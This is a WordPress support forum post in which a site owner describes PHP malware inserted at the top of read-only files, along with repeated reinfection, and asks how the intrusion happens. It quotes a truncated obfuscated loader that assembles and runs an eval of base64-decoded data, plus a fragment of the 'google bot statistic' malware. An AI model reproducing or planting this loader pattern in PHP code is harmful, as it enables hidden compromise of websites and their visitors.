Support » Fixing WordPress » Malware php code in read-only files

  • All the php files have malware binary code inserted in the top of the file, but the files themselves are read-only. (Permission 444)

    Here is an example:
    <?php function qzacgowokc($wnv){$a30q='64';$gvea='$w';$zqe='o';$youp='nv';$y9n0='$w';$i3pz='ase';$otfu='ec';$dk5j='d';$kihc='=b';$ako7='_';$x1i='de(';$jtkw=');';$vy='nv';eval($y9n0.$vy.$kihc.$i3pz.$a30q.$ako7.$dk5j.$otfu.$zqe.$x1i.$gvea.$youp.$jtkw);return $wnv;}$dhjwcu='NyJKCmNDIjdoQ2

    I previously was hacked with the “google bot statistic” malware. I commented on it at the end of the thread here:
    Here is an example:

      // This code use for global bot statistic
      $sUserAgent = strtolower($_SE

    I’ve changed passwords, checked permissions, re-updated to wordpress, changed the theme and still it seems they are getting in. I’ve discussed it with my host but they haven’t gotten back to me (GoDaddy).

    Does anyone have any tips on tracking how it is happening? Someone mentioned seeing ftp logs but Godaddy insists there isn’t ftp logs available.

    Even if I go back to an old version of my site I think it will continue to happen.

  • The topic ‘Malware php code in read-only files’ is closed to new replies.